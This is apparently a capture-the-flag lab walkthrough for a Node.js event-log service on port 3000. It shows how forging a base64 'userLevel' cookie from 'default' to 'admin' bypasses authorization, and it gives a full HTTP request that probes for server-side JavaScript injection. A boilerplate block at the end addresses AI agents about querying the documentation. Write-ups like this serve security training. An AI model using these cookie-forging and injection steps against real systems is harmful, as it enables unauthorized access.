# 3000 - Web Services #### Weak authentication This seems to be an event system that allows us to message an administrator. We can easily create a new user via the `Register` link. Once registered and logged in, we are able to add a new log event under the `New Event Log` tab. However, when we try to submit the new event, the system prompts that "Only the admin can update the Event logs". One interesting thing to notice is the presence of a `userLevel` cookie with the value `ZGVmYXVsdA%3D%3D`. Let's try to base64-decode the string: ``` kali@kali:~$ echo "ZGVmYXVsdA==" | base64 --decode default ``` This decodes as `default`, which may refer to our access level. Let's try to update the `userLevel` cookie with a new value: ``` kali@kali:~$ echo -n admin | base64 YWRtaW4= ``` With this modification in place, we can now send messages. The next interesting find is the `add technical details/code if required` Event Message. Considering that this is a NodeJS application, it might be possible to inject Javascript Code. ``` 3000/tcp open http syn-ack ttl 63 Node.js (Express middleware) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS ``` To test this, we'll send a simple `1+1` operation as an "Event Message". Request Used: ```html POST /logs/new HTTP/1.1 Host: 192.168.135.110:3000 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 25 Origin: http://192.168.135.110:3000 Connection: close Referer: http://192.168.135.110:3000/logs/ Cookie: connect.sid=s%3AmSgkU3koIQeob1Pioo6GSNTjGvc71M7v.ehFLVLDZWnWSLoKEcRe%2B4BWhaQz7TCQJ9dub4Xc3Cac; userLevel=YWRtaW4= Upgrade-Insecure-Requests: 1 Sec-GPC: 1 username=khjkhk&msg=2%2B2 ``` Notice the userLevel cookie how we can exploit it by changing it in base64. ![Send event](https://offsec-platform.s3.amazonaws.com/walkthroughs-images/PG_Practice_41_image_1_xEnsZaqK.png) Send event After reviewing the resulting stored message, we confirm that it actually saved `2`. ![Event result](https://offsec-platform.s3.amazonaws.com/walkthroughs-images/PG_Practice_41_image_2_wGgEOnE8.png) Event result --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://lyethar.gitbook.io/dibble/enumeration/3000-web-services.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.